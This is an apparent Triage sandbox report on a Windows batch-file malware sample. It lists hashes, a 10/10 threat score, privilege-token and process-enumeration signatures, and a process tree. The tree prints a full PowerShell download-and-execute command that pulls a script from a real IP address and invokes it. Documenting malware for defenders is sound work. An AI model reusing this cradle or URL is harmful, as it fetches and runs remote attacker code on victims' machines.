d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4 | Triage

Analysis

max time kernel
127s
max time network
149s
platform
windows10_x64
resource
win10v200430
submitted
15-05-2020 19:19

Sharing

Report Analysis Logs

General

Target

d414776d8291887b69e7e08716350a94.bat
Size

216B
MD5

44b1551634044bfd5c2101792984ab6a
SHA1

c1c890dd032188b9c1488e5cf4ff4f22d88b74e5
SHA256

d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4
SHA512

faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1772 1344 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 1772 WerFault.exe
Token: SeBackupPrivilege 1772 WerFault.exe
Token: SeDebugPrivilege 1772 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe
1772	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"
1⤵
PID:1140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"
2⤵
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1772

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1772-0-0x00000000042B0000-0x00000000042B1000-memory.dmp

Filesize
4KB

Download
memory/1772-1-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download